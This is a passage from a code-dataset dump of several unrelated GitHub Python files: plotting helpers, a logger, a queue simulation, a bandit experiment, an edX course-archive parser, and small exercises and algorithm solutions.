verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n plt.text(s= round(value,2), x=bar_max*0.025, y=i, color=\"w\",\n verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n\n\n # margins\n\n fig.subplots_adjust(left=0.01, right=1, top=0.95, bottom=0.1)\n\n # Title\n\n ax.set_title(title, fontdict={'fontsize':16, 'fontweight':'bold'})\n\n # Add caption\n source = sources\n fig.text(\n 0.01, 0.04, source, color=GREY, \n fontsize=10\n )\n\n # Add authorship\n fig.text(\n 0.01, 0.01, \"Author: Gonzalo Giampaolo\", color=GREY,\n fontsize=12\n )\n plt.savefig(path.reports_figures_dir(save_name+'.png'))\n\n\ndef scatter_regression_plot(df, x, y, hue, x_label, y_label, title, sources, save_name, regression='linear'):\n \"\"\"\n Print a scatter plot with a regression line (linear or log)\n \"\"\"\n\n # df for linear regression\n df_lr = df.copy( deep=True)\n # drop columns with GQ = 0 and NaNs\n df_lr.dropna(subset=[x, y], inplace=True)\n df_lr = df_lr.drop(index=df_lr.loc[(df_lr[x]==0)].index);\n\n if regression=='log':\n # drop some outliers for the LR\n df_lr = df_lr.drop(\n index=df_lr.loc[(df_lr[x]<0.2) & (df_lr[y]>0.5)].index)\n \n df_lr = df_lr.drop(\n index=df_lr.loc[(df_lr[x]>0.3) & (df_lr[y]<0.5)].index)\n df_lr = df_lr.drop(\n index=df_lr.loc[(df_lr[x]>0.4) & (df_lr[y]<0.6)].index)\n\n # transform series into arrays\n\n X = np.array(df_lr[x]).reshape(-1, 1)\n Y = np.array(df_lr[y])\n\n # Initialize linear regression object\n linear_regressor = LinearRegression()\n\n # Fit linear regression model of HDI on the log of CPI\n linear_regressor.fit(np.log(X), Y)\n\n\n # Make predictions\n # * Construct a sequence of values ranging from 0.05 to 0.95 and\n # apply logarithmic transform to them.\n x_pred = np.array([np.log(x/100) for x in 
range(10,105,1)]).reshape(-1, 1)\n\n # * Use .predict() method with the created sequence\n y_pred = linear_regressor.predict(x_pred)\n else:\n # transform series into arrays\n\n X = np.array(df_lr[x]).reshape(-1, 1)\n Y = np.array(df_lr[y])\n\n # Initialize linear regression object\n linear_regressor = LinearRegression()\n\n # Fit linear regression model of LQI on the log of CPI\n linear_regressor.fit(X, Y)\n\n\n # Make predictions\n # * Construct a sequence of values ranging from 0.05 to 0.95 and\n # apply logarithmic transform to them.\n x_pred = np.array([x/100 for x in range(25,105,1)]).reshape(-1, 1)\n\n # * Use .predict() method with the created sequence\n # This is used for plotting\n y_pred = linear_regressor.predict(x_pred)\n y_pred_x = linear_regressor.predict(X)\n \n #### PLOTING\n fig = plt.figure(figsize=(10,7));\n sns.set_style('darkgrid')\n ## scatter plot\n ax = sns.scatterplot(data=df, x = x,\n y = y, zorder=10, hue=hue,size=hue, palette=\"inferno\",\n legend='brief', sizes=(15,100));\n\n ## regression line\n if regression == 'log': \n plt.plot(np.exp(x_pred),y_pred, color='grey', lw=4)\n else:\n plt.plot(x_pred,y_pred, color='grey', lw=4)\n\n\n\n ## annotations\n if y == 'HDI': \n text_relative_pos={'Argentina':(-0.1,0.05),'Chile':(0.1,-0.3),'China':(0.2,-0.4),'Germany':(-0.05,0.05),'Ghana':(0.2,-0.4),\n 'Libya':(0,0.05),'Norway':(0.05,-0.2),'United States':(-0.1,0.05),'Uruguay':(0.1,-0.3),'Niger':(0.1,-0.2)}\n elif y == 'LQI':\n text_relative_pos={'Argentina':(-0.2,0.2),'Chile':(0.05,-0.1),'China':(0.075,-0.1),'Germany':(-0.125,0.075),\n 'Peru':(0.025,-0.05),'Norway':(0.025,-0.15),'United States':(-0.15,0.075),'Uruguay':(0.1,-0.3),\n 'Nigeria':(0.025,0.1),'Denmark':(-0.1,0.0125),'Italy':(-0.2,0.175)}\n \n to_annotate = df[['Country Name',x,y]].values\n\n\n for i,info in enumerate(to_annotate):\n if info[0] in list(text_relative_pos.keys()):\n ax.annotate(info[0], xy=(info[1], info[2]), xycoords='data',\n xytext=(info[1]+text_relative_pos[info[0]][0], info[2]+text_relative_pos[info[0]][1]),\n textcoords='axes fraction', horizontalalignment='right', verticalalignment='top',\n arrowprops=dict(width=2,facecolor='grey', shrink=0.0, headlength=0.01),\n )\n\n # margins\n\n fig.subplots_adjust(left=0.005, right=1, top=0.95, bottom=0.125)\n\n ## seteos plot\n ax.set_xlabel(x_label, fontsize=16)\n ax.set_ylabel(y_label, fontsize=16)\n ax.set_title(title, fontdict={'fontsize':18, 'fontweight':'700'})\n\n ## limits\n\n if y == 'HDI': \n ax.set_xlim(0.1, 1.05)\n ax.set_ylim(0.375, 1)\n elif y == 'LQI':\n ax.set_xlim(0.225, 1.05)\n #ax.set_ylim(0.375, 1)\n\n \n # Add caption\n source = \"Sources: \" + sources\n fig.text(\n -0.05, 0.005, source, color=GREY, \n fontsize=10\n )\n\n # Add authorship\n fig.text(\n -0.05, 0.03, \"Author: Gonzalo Giampaolo\", color=GREY,\n fontsize=12\n )\n\n plt.savefig(path.reports_figures_dir(save_name+'.png'), bbox_inches = 'tight')\n plt.show();\n \n\n","repo_name":"giampa-code/life_quality_and_government","sub_path":"life_quality_and_government/visualization/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":10031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13389240899","text":"import datetime\nfrom os.path import expanduser\n\nclass OperationsLogger(object):\n\n def __init__(self):\n home = expanduser(\"~\")\n self.logs_dir_path = home+\"/clean_and_declutter_logs.txt\"\n return\n \n def log_title(self):\n \"\"\"Appends a \"new session\" title-text line in the 
file used to register logging results.\n \"\"\"\n with open(self.logs_dir_path,'a') as log_file: # Opens (and creates if not exists) the logs file.\n title = \"| NEW SESSION |\".center(71,\"-\") # Defines a title, \"just ---| NEW SESSION |---\" alike.\n title = f\"\\n\\n{title}\\n\" # Adds to linebreaks at the beginning and one extra at the end.\n log_file.write(title) # Write the file with the new session title.\n return\n\n\n def log_operation_result(self, success:bool, path:str, operation:str=\"\", error:str=\"\", msg:str=\"\"):\n \"\"\"Performs the log's writing in the logs file.\n\n Args:\n success (bool): if the log corresponds to a successful or failed operation.\n path (str): of the file/directory which the deleting operation attempt was intended to.\n msg (str, optional): the operation performed. Defaults to \"\".\n error (str, optional): the exception's name. Defaults to \"\".\n msg (str, optional): the exception's message. Defaults to \"\".\n \"\"\"\n with open(self.logs_dir_path,'a') as log_file: # Opens the logs file.\n now = str(datetime.datetime.now()) # Declares new string containing currents date and time.\n result_state = \"SUCCESS\" if success else \"FAILURE\" # Declares new string indicating if result was successful or not.\n result_msg = f\"{error}: {msg} for path\" if len(error) != 0 else f\"{operation}\" # Composes the error message dependening on \"error\" and \"msg\" parameters.\n final_msg = f\"{now} - {result_state} > {result_msg} '{path}'.\\n\" # Composes the final message to be logged.\n log_file.write(final_msg) # Appends the text to the end of the file.\n return\n\n def __repr__(self):\n return f\"Logger pointing to {self.logs_dir_path}\"","repo_name":"EkoTunde/FilesOrganizer","sub_path":"operations_logger.py","file_name":"operations_logger.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24553593675","text":"\"\"\"\n * Modelagem e Avaliação de Desempenho - UFRJ - 2023.2\n * Simulação de Fila M/M/1\n\"\"\"\n\nimport numpy as np\nfrom event import Event, EventType\nimport heapq\n\nSPECIAL_CUSTOMER = 2001\n\n\ndef initialize():\n \"\"\" Inicializa as variáveis da simulação \"\"\"\n elapsed_time = 0 # tempo atual decorrido \n customers_on_system = 0 # clientes no sistema no momento\n customers_served = 0 # clientes que ja foram atendidos\n customers_queue = [] # fila de eventos\n customers_arrived = 0 # numero de clientes que chegaram no sistema\n\n return elapsed_time, customers_on_system, customers_served, customers_queue, customers_arrived\n\n\ndef generate_first_event(Lambda):\n \"\"\" Gera o primeiro evento de chegada \"\"\"\n first_arrival_time = np.random.exponential(1/Lambda) # escolhe um número da distribuição exponencial com media 1/lambda para ser o tempo da primeira chegada\n first_event = Event(EventType.ARRIVAL, first_arrival_time) # cria um evento de chegada com o tempo da primeira chegada\n return first_event \n\n\ndef simulate_queue(simulation_time, Lambda, mu, max_width):\n \"\"\" Simula a fila M/M/1 \"\"\"\n elapsed_time, customers_on_system, customers_served, customers_queue, customers_arrived = initialize()\n queue_is_infinite = not max_width\n\n # Gerar um evento inicial de chegada\n initial_event = generate_first_event(Lambda)\n\n # Adicionar esse evento inicial na fila\n heapq.heappush(customers_queue, initial_event)\n\n # Começar o loop da simulação (enquanto tempo atual for menor que o tempo total de simulação)\n while elapsed_time 
<= simulation_time:\n event = heapq.heappop(customers_queue)\n\n # Interrompe o loop se o tempo do evento for posterior ao final da simulação\n if event.time > simulation_time: \n break\n\n # se o evento for um evento de chegada\n if event.type == EventType.ARRIVAL: \n elapsed_time = event.time # tempo atual recebe o tempo do evento\n next_arrival_time = elapsed_time + np.random.exponential(1/Lambda) # escolhe um numero da distribuição exponencial com media 1/lambda para ser o tempo da proxima chegada\n next_arrival_event = Event(EventType.ARRIVAL, next_arrival_time) # cria um evento de chegada com o tempo da proxima chegada\n heapq.heappush(customers_queue, next_arrival_event) # adiciona o evento de chegada na fila de eventos\n \n # Aceita novos clientes se a fila for infinita ou se o numero de clientes no sistema for menor que o tamanho maximo da fila\n if queue_is_infinite or customers_on_system < max_width:\n customers_arrived += 1 # incrementa o numero de clientes que chegaram no sistema\n customers_on_system += 1 # incrementa o numero de clientes no sistema\n\n if customers_arrived == SPECIAL_CUSTOMER:\n initial_waiting_time = elapsed_time\n \n # se o cliente que chegou for o ultimo na fila\n if customers_on_system == 1: \n service_time = np.random.exponential(1/mu) # escolhe um numero da distribuição exponencial com media 1/mu para ser o tempo de atendimento\n next_departure_time = elapsed_time + service_time # tempo da proxima partida é o tempo atual mais o tempo de atendimento\n next_departure_event = Event(EventType.DEPARTURE, next_departure_time) # cria um evento de partida com o tempo da proxima partida\n heapq.heappush(customers_queue, next_departure_event) # adiciona o evento de partida na fila de eventos\n \n # se o evento for um evento de saida \n elif event.type == EventType.DEPARTURE: \n elapsed_time = event.time # tempo atual recebe o tempo do evento\n customers_on_system -= 1 # decrementa o numero de clientes no sistema\n customers_served += 1 # incrementa o numero de clientes que foram atendidos\n\n if customers_served == SPECIAL_CUSTOMER:\n return elapsed_time - initial_waiting_time\n \n # só adiciona um evento de partida se não for o último cliente a sair do sistema\n if customers_on_system > 0: \n service_time = np.random.exponential(1/mu) # escolhe um numero da distribuição exponencial com media 1/mu para ser o tempo de atendimento\n next_departure_time = elapsed_time + service_time # tempo da proxima partida é o tempo atual mais o tempo de atendimento\n next_departure_event = Event(EventType.DEPARTURE, next_departure_time) # cria um evento de partida com o tempo da proxima partida\n heapq.heappush(customers_queue, next_departure_event) # adiciona o evento de partida na fila de eventos","repo_name":"gabrielejandres/performance-modeling-and-evaluation-2023.1","sub_path":"lists/4/q4/src/mm1.py","file_name":"mm1.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"33735857520","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef bandit(qw, n, alpha, e, change, rewardNoise = 0, isUcb=False):\n q = np.copy(qw)\n k = len(q)\n Q = np.zeros(k)\n c = 2\n optimalChoices = 0\n optimality = np.zeros(n)\n reps = np.zeros(k)\n choice = 0\n rewards = np.zeros(n)\n for i in range(n):\n if (isUcb):\n # print (Q + c * np.sqrt(np.log(reps)/reps))\n # print(np.sqrt(np.log(reps)/reps))\n if (reps.min() == 0):\n choice = reps.argmin(0)\n else:\n 
choice = (Q + c * np.sqrt(np.log(i + 1)/reps)).argmax(0)\n elif (np.random.uniform(0, 1) > e):\n choice = Q.argmax(0)\n else:\n choice = np.random.choice(k)\n optimalChoice = q.argmax(0)\n if (choice == optimalChoice):\n optimalChoices+= 1\n reps[choice] += 1\n reward = np.random.normal(q[choice], rewardNoise)\n if (alpha == 0):\n Q[choice] = Q[choice] + (reward-Q[choice])/reps[choice]\n else:\n Q[choice] = Q[choice] + alpha * (reward - Q[choice])\n rewards[i] = reward\n for y in range(k):\n q[y] += change * np.random.normal(0, 1)\n if(i != 0): \n optimality[i] = optimalChoices/i\n # print(rewards)\n return [rewards, optimalChoices, n, optimality]\n\n\nnn = 100\nnr = 1000\nvaluesLen = 10\nwinners = np.zeros(4)\nprocents = np.zeros(4)\nens = np.zeros(4)\nsums = np.zeros(4)\noptimalities1 = np.zeros(nr)\noptimalities2 = np.zeros(nr)\noptimalities3 = np.zeros(nr)\noptimalities4 = np.zeros(nr)\naverageRewards1 = np.zeros(nr)\naverageRewards2 = np.zeros(nr)\naverageRewards3 = np.zeros(nr)\naverageRewards4 = np.zeros(nr)\nfor p in range(nn):\n qv = np.random.normal(0, 1, valuesLen)\n # qv = [0.1, 0.11, 0.12, 0.13, 0.14, 0.09, 0.08, 0.07, 0.06, 0.05]\n r1 = bandit(qv, nr, alpha=0.3, e=0.01, change=0, rewardNoise=0)\n r2 = bandit(qv, nr, alpha=0, e=0.1, change=0, rewardNoise=0)\n r3 = bandit(qv, nr, alpha=0.1, e=0, change=0, rewardNoise=0)\n r4 = bandit(qv, nr, alpha=0.2, e=0, change=0, rewardNoise=0, isUcb=True)\n optimalities1 += r1[3]\n optimalities2 += r2[3]\n optimalities3 += r3[3]\n optimalities4 += r4[3]\n averageRewards1 += r1[0]/nn\n averageRewards2 += r2[0]/nn\n averageRewards3 += r3[0]/nn\n averageRewards4 += r4[0]/nn\n # print(averageRewards2)\n # print(r2[0])\n# print(averageRewards4)\n# print(optimalities1/nn)\n# print(optimalities4/nn)\n\n# print(averageRewards4)\n\n# plt.plot(optimalities1/nn, 'r')\n# plt.plot(optimalities2/nn, 'g')\n# plt.plot(optimalities3/nn, 'm')\n# plt.plot(optimalities4/nn, 'b')\n# plt.show()\n# print(averageRewards4)\nplt.plot(averageRewards1, 'r')\nplt.plot(averageRewards2, 'g')\nplt.plot(averageRewards3, 'm')\nplt.plot(averageRewards4, 'b')\nplt.show()","repo_name":"akmere/reinforcementLearning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"34802187034","text":"import logging\nimport os\n\nfrom bs4 import BeautifulSoup\nfrom django.conf import settings\n\nfrom app_cttoolv2.filesystem import get_configuration\nfrom app_cttoolv2.write_olx import write_vertical\n\nlogger = logging.getLogger()\n\n\nclass OLXReader:\n \"\"\"\n This class travels through whole input tar file and\n fetches course data and modifying the LTIs besides.\n \"\"\"\n def __init__(self):\n self.vds_cnt = 0\n self.lti_cnt = 0\n\n def traverse_workspace(self, path):\n \"\"\"\n Traverses the directory structure of the unpacked .tar.gz file.\n Inputs:\n path: Path to root of unpacked file.\n \"\"\"\n course_detail = {}\n course_metadata = {}\n course_outline = []\n\n base_path = str(path) + '/' + os.listdir(str(path))[0] + '/'\n course_tree = get_course_tree(path, len(base_path))\n\n if settings.COURSE_XML in course_tree.get('course'):\n file_full_path = os.path.join(base_path+'course/', settings.COURSE_XML)\n course_detail = parse_course_xml(file_full_path)\n if (\n 'course_url' in course_detail and\n course_detail['course_url'] + '.xml' in\n course_tree.get('course/course')\n ):\n file_full_path = os.path.join(\n base_path+'course/course',\n 
course_detail['course_url'] + '.xml'\n )\n course_metadata = parse_course_url_xml(file_full_path)\n if 'course/chapter' in course_tree:\n file_full_path = os.path.join(base_path+'course/')\n course_outline = self._traverse_course_content(file_full_path)\n\n logger.info('Total LTIs converted : %s', self.lti_cnt)\n logger.info('VDS LTIs converted : %s', self.vds_cnt)\n\n info_context = {\n 'lti_cnt': self.lti_cnt,\n 'vds_cnt': self.vds_cnt,\n 'course_name': course_metadata['display_name']\n }\n\n return {\n 'course_metadata': course_metadata,\n 'course_outline': course_outline,\n 'base_path': base_path,\n 'course_key_tags': course_detail,\n 'info_context': info_context\n }\n\n def _traverse_course_content(self, course_path):\n \"\"\"\n Traverses through course content(e.g. section, subsection and unit).\n Inputs:\n course_path: path to course directory.\n \"\"\"\n sequentials = os.listdir(str(course_path+'sequential'))\n sequential_list = []\n for sequential in sequentials:\n sequential_list.append(\n self.parse_sequential_xml(sequential, course_path)\n )\n return sequential_list\n\n def parse_sequential_xml(self, seq_name, course_path):\n \"\"\"\n Parse the .xml and extract vertical tags.\n Inputs:\n seq_name: name of sequential xml file.\n course_path: path to course directory.\n \"\"\"\n sequntial_path = course_path + 'sequential/' + seq_name\n with open(sequntial_path, 'r', encoding='utf-8') as seq_xml_file:\n data = seq_xml_file.read()\n\n bs_data = BeautifulSoup(data, 'xml')\n vertical_list = []\n seq_display_name = bs_data.find('sequential').get(\"display_name\")\n verticals = bs_data.find_all('vertical')\n for vertical in verticals:\n vertical_name = vertical.get('url_name') + '.xml'\n vertical_list.append(\n self.parse_vertical_xml(\n vertical_name,\n course_path\n )\n )\n return {\n \"seq_display_name\": seq_display_name,\n \"verticals\": vertical_list\n }\n\n def parse_vertical_xml(self, vertical_name, course_path):\n \"\"\"\n Parse the .xml and extract vertical tags.\n Inputs:\n vertical_name: name of vertical xml file.\n course_path: path to course directory.\n \"\"\"\n env_conf = get_configuration()\n\n vertical_path = course_path + 'vertical/' + vertical_name\n with open(vertical_path, 'r', encoding='utf-8') as vertical_xml_file:\n data = vertical_xml_file.read()\n\n bs_data = BeautifulSoup(data, 'xml')\n component_list = []\n\n vertical_display_name = bs_data.find('vertical').get(\"display_name\")\n vertical_visible_to_staff_only = bs_data.find('vertical').get(\"visible_to_staff_only\")\n\n conf = {\n 'launch_url': env_conf.get('launch_url'),\n 'tool_id': env_conf.get('tool_id')\n }\n\n lti_adv_dt = bs_data.find('lti_advantage_consumer')\n if lti_adv_dt:\n self.lti_cnt += 1\n lti_launch_url = lti_adv_dt.get('launch_url')\n\n if (\n lti_launch_url and 'SelfActivatingAssessmentLauncher'\n in lti_launch_url\n ):\n self.vds_cnt += 1\n conf['tool_id'] = env_conf.get('vds_tool_id')\n\n env_tag = next(\n (env for env in settings.ENV_LIST if env in lti_launch_url),\n False\n )\n if env_tag:\n lti_launch_url.replace(env_tag, settings.ENV_NAME.lower(), 1)\n\n conf['launch_url'] = lti_launch_url\n\n logger.info(\n 'VDS LTI converted, name: %s',\n lti_adv_dt.get('display_name')\n )\n\n conf['custom_parameters'] = lti_adv_dt.get('custom_parameters')\n conf['url_name'] = lti_adv_dt.get('url_name')\n conf['xblock-family'] = lti_adv_dt.get('xblock-family')\n conf['has_score'] = lti_adv_dt.get('has_score')\n conf['ask_to_send_username'] = lti_adv_dt.get(\n 'ask_to_send_username'\n )\n 
conf['ask_to_send_name'] = lti_adv_dt.get('ask_to_send_name')\n conf['ask_to_send_email'] = lti_adv_dt.get('ask_to_send_email')\n conf['display_name'] = lti_adv_dt.get('display_name')\n\n write_vertical(vertical_path, conf, vertical_display_name, vertical_visible_to_staff_only)\n\n for vertical in bs_data.children:\n tag_name = ''\n file_name = ''\n for v_child in vertical.findAll():\n tag_name = v_child.name\n file_name = v_child.get(\"url_name\")\n component_list.append(\n {\n \"ver_display_name\": vertical_display_name,\n \"tag_name\": tag_name,\n \"file_name\": file_name\n }\n )\n return component_list\n\n\ndef get_course_tree(path, base_path_len):\n \"\"\"\n Returns a dict of lists having directory(key) and list of file(value).\n Inputs:\n path: Path to root of unpacked file.\n base_path_len: length of base path.\n \"\"\"\n course_tree = {}\n # pylint: disable=unused-variable\n for root, dir_names, file_names in os.walk(str(path)):\n if file_names:\n course_tree[root[base_path_len:]] = file_names\n return course_tree\n\n\ndef parse_course_xml(course_xml):\n \"\"\"\n Parse the course.xml file and extract attributes.\n Inputs:\n course_xml: course_xml file.\n \"\"\"\n with open(course_xml, 'r', encoding='utf-8') as course_xml_file:\n data = course_xml_file.read()\n\n bs_data = BeautifulSoup(data, 'xml')\n\n course_tag = bs_data.find('course')\n course = course_tag.get('course')\n org = course_tag.get('org')\n url_name = course_tag.get('url_name')\n\n logger.info('course_tag_attributes: %s %s %s', course, org, url_name)\n return {\n 'course_run': course,\n 'course_org': org,\n 'course_url': url_name\n }\n\n\ndef parse_course_url_xml(course_url_path):\n \"\"\"\n Parse the .xml and extract course details like name.\n Inputs:\n course_url_path: Path to course url file.\n \"\"\"\n with open(course_url_path, 'r', encoding='utf-8') as course_url_file:\n data = course_url_file.read()\n\n bs_data = BeautifulSoup(data, 'xml')\n\n course_tag = bs_data.find('course')\n display_name = course_tag.get('display_name')\n course_start = course_tag.get('start')\n course_conclude = course_tag.get('conclude')\n\n logger.info('course_name: %s', display_name)\n return {\n 'display_name': display_name,\n 'course_start': course_start,\n 'course_conclude': course_conclude\n }\n","repo_name":"dcadams/CTTool-v2","sub_path":"app_cttoolv2/read_olx.py","file_name":"read_olx.py","file_ext":"py","file_size_in_byte":8521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"2090824013","text":"import pickle5 as pickle\nimport json\nimport numpy as np\n\n#write function to transform the input data from user \ndef transform_text(text):\n text = text.upper()\n new_text = ''\n for i in text.split():\n new_text = new_text+i+'-'\n return new_text\n\n\n\ndef transform_input_data(raw_data, scalar):#list\n #input_data is dict type\n output_datas = {}\n for k in raw_data:\n value = raw_data[k]\n #category_value = transform_text(category_value)\n if 'Sender' in k:\n value = transform_text(value)\n transformed_value = value + 'sender'\n elif 'Bene' in k:\n value = transform_text(value)\n transformed_value = value + 'bene'\n elif k == 'USD_Amount':\n transformed_value = scalar.transform(np.array(value).reshape(1,-1))[0][0]\n else:\n transformed_value = transform_text(value).rstrip('-')\n output_datas[k] = transformed_value\n \n return output_datas #dict\n\n#write function to encode the data\n\n\n\n#user_data = transformed data result from transform_input_data\ndef 
encode_user_data(user_data,init_data):\n for k in user_data:\n if k == \"Sender_Country\":\n for k1 in init_data:\n if k1 in user_data.values():\n init_data[k1] = 1\n else:\n init_data['other-sender']=1\n\n elif k == \"Bene_Country\":\n for k1 in init_data:\n if k1 in user_data.values():\n init_data[k1] = 1\n else:\n init_data['other-bene'] = 1 \n\n else:\n for k1 in init_data:\n if k1 in user_data.values():\n init_data[k1] = 1\n \n init_data['USD_amount'] = user_data[\"USD_Amount\"]\n encoded_data = init_data\n return encoded_data\n\n\n\n","repo_name":"cindydao95/Applied-MachineLearning-to-FinancialFraudTransaction-Detection","sub_path":"transform_prediction_data.py","file_name":"transform_prediction_data.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"9979687417","text":"# Exercício 4:\n# Escreva uma função em Python que receba uma matriz como entrada e verifique se a matriz é \n# simétrica. Uma matriz é simétrica se ela for igual à sua transposta.\n\ndef verifica_simetria(mat):\n\n linhas = len(mat)\n colunas = len(mat[0])\n\n if linhas != colunas:\n return False\n\n transposta = [[0 for _ in range(linhas)]for _ in range(colunas)]\n\n for i in range(linhas):\n for j in range(colunas):\n if mat[i][j] != mat[j][i]:\n return False\n \n return True\n\n\n# mat = [[x for x in range(5)]for x in range(5)]\nmat = [\n [1, 2, 3],\n [2, 4, 5],\n [3, 5, 6]\n]\n\nprint(verifica_simetria(mat))\n","repo_name":"welli7ngton/Python","sub_path":"Matrizes/exercicio11.py","file_name":"exercicio11.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"12828284438","text":"from django.urls import path, include\n\nfrom . 
import views\n\nimport sys\nsys.path.append('../')\nsys.path.append('../../')\n\nurlpatterns = [\n path('index/', views.index),\n path('article//', views.article_page ,name='article_page'),\n path('edit/', views.edit_page,name='edit_page'),\n path('edit/action/', views.edit_action,name='edit_action'),\n path('hello/', views.hello),\n]","repo_name":"duopa/CodeLearning","sub_path":"py-Django/myblog/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"71861230405","text":"\n\n#word = input(\"Enter Word:\")\nword = \"ababab\"\ncount = 0\n\ndef checkForWord( position, counter ):\n if word[position] == 'b'and word[position+1] == 'a' and word[position+2] == 'b' :\n counter += 1\n return checkForWord(position+2, counter)\n else:\n print(\"IN\")\n return position\n\nif (len(word)%3) == 0 and len(word) != 0 :\n print(\"Can be a word\")\n try:\n i=0\n for i in range(0, len(word)-2, 3):\n if word[i] == 'a'and word[i+1] == 'b' and word[i+2] == 'a' :\n print(\"aba\")\n i = checkForWord( i+2, count)\n else:\n print(\"not a word\")\n break\n except ValueError:\n print(\"ERROR\")\nelse:\n print(\"Definetly not a word\")\n\n","repo_name":"grichan/python-small-projects","sub_path":"recursionTest.py","file_name":"recursionTest.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"36339799080","text":"#10%\ndef get10(price):\n tip = price * 0.10\n f_price = price + tip\n return (f_price)\n\n#15%\ndef get15(price):\n tip = price * 0.15\n f_price = price + tip\n return (f_price)\n\n#20%\ndef get20(price):\n tip = price * 0.20\n f_price = price + tip\n return (f_price)\n\n#daily sales exclude tips\ndaily_sales = 0\ndaily_tip = 0\n\n#main\nwhile True:\n price = float(input(\"Enter meal price: \"))\n while price == 0:\n print(\"Invalid price. \")\n price = float(input(\"Enter meal price: \"))\n\n print(\"Select tip amount: \\n 1. 10% (Okay) \\n 2. 15% (Good) \\n 3. 20% (Excellent) \\n 4. Skip (Broke) \\n 5. Custom \")\n tip_choice = float(input(\"Choice: \"))\n\n #improve this on exception\n if tip_choice == 1:\n print(\"Total price is \", get10(price), \"\\n\")\n daily_sales += price\n elif tip_choice == 2:\n print(\"Total price is \", get15(price), \"\\n\")\n daily_sales += price\n elif tip_choice == 3:\n print(\"Total price is \", get20(price), \"\\n\")\n daily_sales += price\n elif tip_choice == 4:\n print(\"Total price is \", price, \"\\n\")\n daily_sales += price\n elif tip_choice == 5:\n cus_tip = float(input(\"Enter tip: \"))\n price += cus_tip\n print(\"Total price is \", price, \"\\n \")\n daily_sales += price\n else:\n continue\n\n c = input(\"Continue another payment? (y/n) \")\n if c == \"y\":\n continue\n else:\n print(\"Closed. 
\\n Summary of daily sales: \", daily_sales)\n quit()\n","repo_name":"swiyt/-stdio.h-","sub_path":"CardReader.py","file_name":"CardReader.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11920024834","text":"#\n# @lc app=leetcode id=349 lang=python3\n#\n# [349] Intersection of Two Arrays\n#\n\n# @lc code=start\nclass Solution:\n def intersection(self, nums1: List[int], nums2: List[int]) -> List[int]:\n ############### hashmap ##############\n # hashmap = {}\n # res = []\n # for num1 in nums1:\n # hashmap[num1] = hashmap[num1] + 1 if num1 in hashmap else 1\n # for num2 in nums2:\n # if num2 in hashmap and hashmap[num2] > 0:\n # res.append(num2)\n # hashmap[num2] = 0\n # return res\n \n ############# two pointers ##############\n nums1.sort()\n nums2.sort()\n res = set()\n \n p1,p2 = 0,0\n while p1 < len(nums1) and p2 < len(nums2):\n if nums1[p1] > nums2[p2]:\n p2 += 1\n elif nums1[p1] < nums2[p2]:\n p1 += 1\n else:\n res.add(nums1[p1])\n p1+=1; p2+=1\n return list(res)\n# @lc code=end\n\n","repo_name":"AllenJShi/LeetCode","sub_path":"349.intersection-of-two-arrays.py","file_name":"349.intersection-of-two-arrays.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"18088079138","text":"import collections\nclass directed_graph:\n def __init__(self,vertex):\n self.vertex=vertex\n self.adjMatrix=[[0 for i in range(vertex)] for j in range(vertex)]\n\n def addEdge(self,v1,v2):\n self.adjMatrix[v1][v2]=1\n\n def removeedge(self,v1,v2):\n if self.containEdge(v1,v2)!=True:return\n self.adjMatrix[v1][v2]=0\n\n def containEdge(self,v1,v2):\n return self.adjMatrix[v1][v2]==1\n\n def printgraph(self):\n print(' ',end='')\n for i in range(self.vertex):\n print(i,end=' ')\n print()\n print()\n i=0\n for ele in self.adjMatrix:\n print(i,end=' ')\n print(ele)\n print()\n i+=1\n\n\n\n\n\ndef dfs_helper(start,adj,vertex,visited,st):\n visited[start]=True\n for i in range(vertex):\n if adj[start][i]==1 and visited[i]==False:\n dfs_helper(i,adj,vertex,visited,st)\n st.appendleft(start)\n return\n\ndef topology_sort_dfs(adj,vertex):\n st=collections.deque()\n visited=[False for i in range(vertex)]\n for i in range(vertex):\n if visited[i]==False:\n dfs_helper(i,adj,vertex,visited,st)\n return list(st)\n\n\n\n\n\n\ng=directed_graph(5)\ng.addEdge(0,2)\ng.addEdge(2,1)\ng.addEdge(1,0)\ng.addEdge(1,3)\ng.addEdge(4,3)\ntopo=topology_sort_dfs(g.adjMatrix,g.vertex)\nprint(topo)","repo_name":"Shubhamkumarjha1244/DSA_PYTHON","sub_path":"DSA-using_python/SDE graphs/topology_sort_direct_graph_dfs.py","file_name":"topology_sort_direct_graph_dfs.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39204199874","text":"from functools import partial\nfrom itertools import zip_longest\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.linalg import cho_factor, cho_solve\nfrom scipy.special import expit\nfrom sklearn import 